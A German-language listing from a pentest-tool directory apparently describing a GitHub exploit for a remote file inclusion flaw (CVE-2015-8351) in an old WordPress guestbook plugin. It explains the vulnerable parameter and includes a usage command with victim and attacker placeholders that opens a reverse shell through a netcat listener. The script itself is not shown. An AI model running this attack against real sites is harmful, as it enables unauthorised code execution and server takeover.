Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
exploit-CVE-2015-8351 — WordPress-Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion | Kitploit
Tools/GitHubGitHub/g4sp4rcs/exploit-cve-2015-8351
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubg4sp4rcs/exploit-cve-2015-8351

exploit-CVE-2015-8351

WordPress-Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion

Repository anzeigen
2vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Gwolle Guestbook WordPress Plugin RFI Exploit

Dieses Python-Skript nutzt eine kritische Remote File Inclusion (RFI)-Schwachstelle im Gwolle Guestbook WordPress Plugin aus, die von einem nicht authentifizierten Angreifer ausgenutzt werden kann, um eine entfernte PHP-Datei einzubinden und beliebigen Code auf dem verwundbaren System auszuführen.

Details zur Schwachstelle

Der HTTP-GET-Parameter "abspath" wird nicht ordnungsgemäß bereinigt, bevor er in der PHP-Funktion require() verwendet wird. Ein entfernter Angreifer kann eine Datei namens 'wp-load.php' von einem beliebigen Remote-Server einbinden und deren Inhalt auf dem verwundbaren Webserver ausführen. Dazu muss der Angreifer eine schädliche 'wp-load.php'-Datei im Document Root seines Servers ablegen und die URL des Servers in die Anfrage einfügen.

Eine erfolgreiche Ausnutzung dieser Schwachstelle kann zur Kompromittierung der gesamten WordPress-Installation führen und möglicherweise sogar die Kompromittierung des gesamten Webservers zur Folge haben.

Verwendung

Das Skript erfordert drei Argumente:

  • Ziel-URL: Die URL der verwundbaren WordPress-Installation.
  • Angreifer-Host: Die IP-Adresse oder der Hostname des Rechners des Angreifers.
  • Angreifer-Port: Die Portnummer, auf der der Angreifer auf eine Reverse Shell lauscht.

Beispiel:

root@kitploit:~
python3 exploit.py VICTIM_IP/WORDPRESS ATTACKER_IP ATTACKER_PORT

Hinweis: Sie müssen auf dem Rechner des Angreifers einen Netcat-Listener auf dem angegebenen Port geöffnet haben.

Haftungsausschluss

Dieses Skript dient ausschließlich zu Bildungszwecken. Der Autor übernimmt keine Verantwortung für Schäden, die durch die missbräuchliche Verwendung dieses Skripts entstehen.

Tool herunterladen